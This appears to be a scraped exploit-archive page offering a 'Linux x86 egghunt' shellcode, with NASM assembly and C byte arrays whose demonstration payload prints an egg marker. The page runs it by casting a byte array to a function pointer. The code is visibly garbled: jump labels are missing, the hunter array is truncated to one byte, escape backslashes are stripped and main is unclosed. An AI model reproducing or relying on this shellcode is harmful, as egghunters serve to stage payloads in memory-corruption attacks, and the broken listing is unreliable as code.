[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Linux x86 egghunt shellcode
# Published : 2011-07-21
# Author :
# Previous Title : Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
# Next Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes

Exploit Title: Linux/x86 egghunt shellcode 29 bytes NULL free
Date: 23-07-2011
Author: Ali Raheem
Tested on: 
Linux Ali-PC.home #1 SMP Wed Jul 6 13:58:54 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Linux injustice 2.6.38-10-generic #46-Ubuntu SMP Tue Jun 28 15:05:41 UTC 2011 i686 i686 i386 GNU/Linux
http://codepad.org/2yMrNY5L Code pad lets you execute code live check here for a live demostration
Thanks: Stealth- for testing and codepad.com for being so useful.
section .data
	msg     db "We found the egg!",0ah,0dh
        msg_len equ $-msg
        egg     equ "egg "
        egg1    equ "mark"
section .text
	global  _start
       	jmp     _return
	pop     eax             ;This can point anywhere valid
      	inc     eax		;change to dec if you want to search backwards
       	cmp     dword [eax-8],egg
        jne     _next
        cmp     dword [eax-4],egg1
        jne     _next
        jmp     eax
        call    _continue
     	db	"egg mark"              ;QWORD egg marker
        sub     eax,8
        mov     ecx,eax
        mov     edx,8
        mov     eax,4
        mov     ebx,1
        int     80h
        mov     eax,1
        mov     ebx,0
        int     80h
char hunter[] =
"x40" /* x40 = inc eax, x48 = dec eax try both*/

char egg[] =
"egg mark" /* The rest of this is the shellcode you want found*/
"x83xe8x08" /*This shellcode prints eax-4 i.e. the egg mark*/

int main(){
     (*(void  (*)()) hunter)();
     return 0;